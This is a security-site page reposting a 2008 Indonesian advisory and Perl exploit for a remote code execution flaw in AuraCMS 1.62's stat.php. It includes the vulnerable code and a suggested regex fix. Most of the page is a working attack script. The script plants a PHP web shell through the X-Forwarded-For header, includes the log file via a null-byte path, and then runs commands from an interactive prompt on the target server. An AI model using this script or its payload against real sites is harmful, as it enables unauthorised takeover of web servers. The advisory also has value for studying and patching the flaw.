首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 AuraCMS 1.62 (stat.php) Remote Code Execution Exploit 来源：http://newhack.org 作者：k1tk4t 发布时间：2008-01-18   #!/usr/bin/perl # # Indonesian Newhack Security Advisory # ------------------------------------ # AuraCMS 1.62 - (stat.php) Remote Code Execution Exploit # Waktu :  Jan 16 2008 10:00PM # Software :  AuraCMS 1.62  #    AuraCMS Mod Block Statistik | http://iwan.or.id/download/lihat/1/2-1-6.html # Vendor :  http://www.auracms.org/ # Ditemukan oleh :  k1tk4t  |  http://newhack.org # Lokasi :  Indonesia # Penjelasan : # # Kutu pada berkas "stat.php" didalam direktori /mod pada aplikasi web auracms 1.62 # ---//--- # 17. Function User_Online ($minutes, $NamaFile){ # 18. //$ip = $REMOTE_ADDR; # 19. $ip = getenv("HTTP_X_FORWARDED_FOR"); # 20. if (getenv("HTTP_X_FORWARDED_FOR") == ''){ # 21. $ip = getenv("REMOTE_ADDR"); # 22. } # ---//--- # 47. fseek($f,0,SEEK_SET); # 48. ftruncate($f,0); # 49. array_pop($user); # 50. foreach ($user as $line) # 51.  { # 52. list($savedip,$savedtime) = split("\|",$line); # 53. if ($savedip == $ip) {$savedtime = $time;$found = 1;} # 54. if ($time < $savedtime + ($minutes * 60)) # 55. { # 56. fputs($f,"$savedip|$savedtime\n"); # 57. $users = $users + 1; # 58. } # 59. } # 60. # 61. if ($found == 0) # 62. { # 63. fputs($f,"$ip|$time\n"); # 64. $users = $users + 1; # 65. } # 66. # 67. fclose ($f); # ---//--- # # Sebagai Contoh; # $ip = getenv("HTTP_X_FORWARDED_FOR"); # $ip = <?php phpinfo() ?>  # <-- user menginjeksi phpinfo # format yang tersimpan # <?php phpinfo() ?>|WAKTUBERKUNJUNG # # pada AuraCMS versi 1.62, log di simpan pada berkas /mod/online.db.txt [Default] # # pada Mod Block Statistik, log disimpan pada berkas /logs/online.db.txt [Default] # # pada AuraCMS versi 2.x mod "online", getenv("HTTP_X_FORWARDED_FOR") bisa berakibat terjadinya "SQL Injection" # # => "Perbaikan Kutu stat.php" # ---//--- # 19. $ip = getenv("HTTP_X_FORWARDED_FOR"); # 20. if (preg_match('/^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$/', getenv("HTTP_X_FORWARDED_FOR")) == ''){ # 21. $ip = getenv("REMOTE_ADDR"); # 22. } # ---//--- # # Exploit ini dibuat untuk pembelajaran, pengetesan dan pembuktian dari apa yang kami pelajari, # saya[k1tk4t] dan "Indonesian Newhack Technology" tidak bertanggung jawab akan kerusakan # yang diakibatkan dari penyalahgunaan exploit oleh pihak lain     # # => # Terima Kasih untuk; # -[opt1lc, fl3xu5, ghoz]- # str0ke, DNX, xoron, y3dips, L41n, cyb3rh3b, K-159, the_hydra, NoGe # nyubi, iFX, sin~X, k1n9k0ng, bius, selikoer, aldy_BT # Komunitas Security dan Hacker Indonesia # # ----------------------------[Mulai]------------------------------------ use IO::Socket; if(!$ARGV[2]) { print "\n  |-------------------------------------------------------|"; print "\n  |            Indonesian Newhack Technology              |"; print "\n  |-------------------------------------------------------|"; print "\n  | AuraCMS 1.62 (stat.php) Remote Code Execution Exploit |"; print "\n  |                  Coded by k1tk4t                      |"; print "\n  |-------------------------------------------------------|"; print "\n[!] "; print "\n[!] Penggunaan : perl auracms22.pl [Site] [Path] [Port]"; print "\n[!] Contoh     : perl auracms22.pl localhost /aura162/ 80"; print "\n[!] "; print "\n"; exit; } $oriserver = $ARGV[0]; $orihost   = "http://".$oriserver; $oridir    = $ARGV[1]; $oriport   = $ARGV[2]; print "- Melakukan Koneksi $orihost$oridir\r\n";   $injurl = "index.php?pilih=stat&mod=yes"; $injeksi = $oridir.$injurl; $kodeterlarang = "<?php echo t4mugel4p;error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()){\$_GET[cmd]=stripslashes(\$_GET[cmd]);}passthru(\$_GET[cmd]);die;?>"; print "- Sedang menginjeksi kode jahat\r\n"; $injkode =  IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Koneksi Gagal...\r\n"; print $injkode "GET ".$injeksi." HTTP/1.1\n"; print $injkode "Host: ".$oriserver."\r\n"; print $injkode "X-Forwarded-For: ".$kodeterlarang."\r\n"; print $injkode "\r\n\r\n"; close ($injkode); while($perintah !~ "mati") { $ekseurl = "index.php?pilih=online.db.txt%00&mod=yes&cmd=".$perintah.""; $eksekusi = $oridir.$ekseurl; print "- Sedang mencoba menjalankan kode injeksi\r\n"; $eksekode =  IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Koneksi Gagal...\r\n"; print $eksekode "GET ".$eksekusi." HTTP/1.1\n"; print $eksekode "Host: ".$oriserver."\r\n"; print $eksekode "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"; print $eksekode "Accept: */*\r\n"; print $eksekode "Connection: close\r\n\n"; while ($hasil = <$eksekode>) { print $hasil; } print "[+]perintah => "; $perintah = <STDIN>;  }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Digital Data Communications (R ·MS Windows Message Queuing Ser ·BitTorrent and UTorrent Peers ·OpenBSD 4.2 rtlabel_id2name() ·MyBulletinBoard (MyBB) <= 1.2. ·Windows RSH daemon <= 1.8 Remo ·PixelPost 1.7 Remote Blind SQL ·Axigen <= 5.0.2 AXIMilter Remo ·PixelPost 1.7 Remote Blind SQL ·Coppermine Photo Gallery 1.4.1 ·Cisco VPN Client IPSec Driver ·HP Virtual Rooms WebHPVCInstal   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved